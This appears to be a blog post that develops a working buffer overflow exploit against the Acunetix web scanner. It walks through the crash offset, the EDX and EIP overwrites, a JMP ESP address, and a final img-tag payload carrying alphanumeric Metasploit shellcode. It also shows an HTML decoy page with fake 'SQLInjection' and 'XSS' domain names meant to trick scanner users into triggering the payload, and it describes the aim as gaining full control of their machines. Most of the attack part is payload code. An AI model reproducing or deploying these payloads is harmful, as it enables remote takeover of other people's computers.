After a little research about
this option, I figured out that ACUNETIX starts its wizard by sending an HTTP
request to the site and learning about it from its HTTP response.
“<img src=http://externalSource.com/someimg.png >”
“<a href=http://externalSource.com/ ></a>”
Etc...
Further Analysis reveals that if one
of the external domain name length is more than 268 Byte’s, ACUNETIX will
be crashed , so if we want to cause a crash, all we need to do is to put some
kind of external source at our site, which have the length of 268 Byte’s or more,
say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA”>
Quick view of this application in
Immunity Debugger reveals that EDX was corrupted by the fuzzing string which caused
access violation:
Despite the fact that further
writing runs over the Structured Exaction Handler (SEH) as you will probably
notice ,my advice for you is not to go that way, believe me I tried it for
several days with no success (because of the safe SHE mechanism).
However, we have another problem with
this exploit, In one word, “ASCII”.
ACUNETIX gets its information
about external domains as a URL.
This fact causing the string to
be converted into Web Browser friendly string.
While ASCII accepts chars like:
0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …
URL string accepts only printable
alphanumeric chars and URL converted special chars (with few exceptions).
So if my external source contains
one of the special chars, they will be converted into
”%SOMETHING”.
For example, the
char "quotes" (“) will be converted into 253232 in the memory because
it’s the translation of %22.
Another example that demonstrates
the URL encoding is: the char "percent" (%) which will be converted into 253235 in the
memory.
Bypassing it, will be by building
an exploit that contains only "A-Z, a-z, 1-0" chars and few special
chars that aren’t converted in the process of URL ENCODE like:
"! ( ) = }
{ " .
(not a simple job at all)
In short, I had to find a way to
fix the flow of the application in order to avoid SEH based exploit (Because it
was impossible to bypass safe SHE protection with URL ASCII strings only).
Finally, I found a way.
In order to fix the flow, EDX had
to be overwritten with a readable memory address.
Nevertheless, it is important to
remember that EDX is not been used as is, but minus 8:
MOVE ECX, DWORD PTR DS: [EDX-8];
Meaning that it doesn’t matter
which memory address we use, we should add 8 to the address (in the exploit),
convert the whole address into printable URL STRING, and hope to the best.
After little research, I found
such an address.
The address was at “0x663030XX” and
luckily it had the possibility to be converted into URL String without special
bad char's --> "
f005 ".
After playing with the code I
found that the exact location of that EDX overwrite, is at 268 Byte's offset.
So for now our exploit looks like
this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
Running ACUNETIX's scan against
that payload, caused the next result:
As you can see above, the EIP was
overwritten!!
It appears that the idea of
fixing the flow was successful since it enabled me to be in a better position
of attack (EIP overwrite).
Beside it, our potential space
for shell code is now presented in EAX and ESP.
When it comes to the decision whether
choosing ESP or EAX, ESP is a better choice from two different aspects:
One, ESP is pointing directly at
the beginning of the shell string.
Two, there is much more space for
a biggest shell code to be written.
After I chose ESP, I needed to
find an instruction of “JMP ESP” in a memory address that could be written by
URL string (limited ASCII as mention above).
The desired address successfully
founded at the location of: 0x7e79515d (SXS.DLL) –
(In ASCII “ ]Qy~ “).
After all that, our shell code supposed
to look like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
- 500f
= 0x66303035 : readable memory location for fixing the flow of the application
that was corrupted by the buffer overflow.
- ]Qy~
= 0x7e79515d (JMP ESP from SXS.DLL).
OK, right now we are at the semifinal
stage, running the application against above payload, produced the next result:
Yea… we landed exactly at the
beginning of the final payload.
The next step will be to use
suitable windows shell that will be made only from URL string (limited ASCII).
Such shell can be generated with
“ Metasploit ” and it is called "Alphanumeric Shell".
The important thing to remember while
using such payload, is that the payload's start address must be presented at
one of the registers. If the payload presents at ESP, the first OP CODE of the
shell need to be "PUSH ESP".
In my Proof of concept, I used
simple "CALC.EXE" shell code generated by “Metasploit that
led me to the final stage which is ;working exploit!!
Moreover, our exploit is successfully
bypassing DEP protection, simply by choosing only the addresses that aren’t
compiled with DEP.
And due to the fact that ACUNETIX
itself is not complied with DEP, this exploit should work perfectly on windows XP.
After successfully reaching all
our goals, Let’s look on the final working exploit:
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
We need to remember that in order
to enjoy our exploit, the newbie hacker must check our extra domain name, in
the list of the extra domains in ACUNETIX wizard window.
So what can we do in order to
make our domain name attractive?
Thinking about it, I came up with
two ideas:
1: writing some attempting domain
name that will make the hackers check that domain, like, ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il .
2: using several external domains
with the following names:
“SQLINJECTION”
“XSS”
“CSRF”
And so on…
These kind of names will probably
give the eye of the hacker the feeling that the domain list window is actually
an options window.
The written code bellow
demonstrates that kind of misleading:
<html>
<img src="http://SQLInjection........................................
.....................................................................
.....................................................................
............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src="http://XSS.................................................
.....................................................................
.....................................................................
...">
<img src="http://CSRF................................................
.....................................................................
.....................................................................
....">
<img src="http://DeepScan............................................
.....................................................................
.....................................................................
........">
<img src="http://NetworkScan.........................................
.....................................................................
.....................................................................
...........">
<img src="http://DenialOfService.....................................
.....................................................................
.....................................................................
...............">
</html>
In conclusion,
Following all the above, we
created a powerful exploit that Newbie hackers
will definitely fall
for.
This exploit will give us the
ability to do everything with all that nasty Newbie hackers that scan our sites
day and night, killing our traffic, filling all the web site forms with junk
and so on…
Furthermore it can be used in
order to collect smart intelligence about hostile forces who want to attack our
web application.
BUT!!
The more powerful idea that
motivated me to reveal this concept and POC, is the fact that this exploit is
Anonymity killer! , because even if the attacker uses the most smart and secure
proxy in the world, such as "TOR" and others, his ass will be revealed
and full control on his scanning machine will be gained.
Thanks all for reading my post,
hope you enjoy it.
Exploit Download Link: Click Here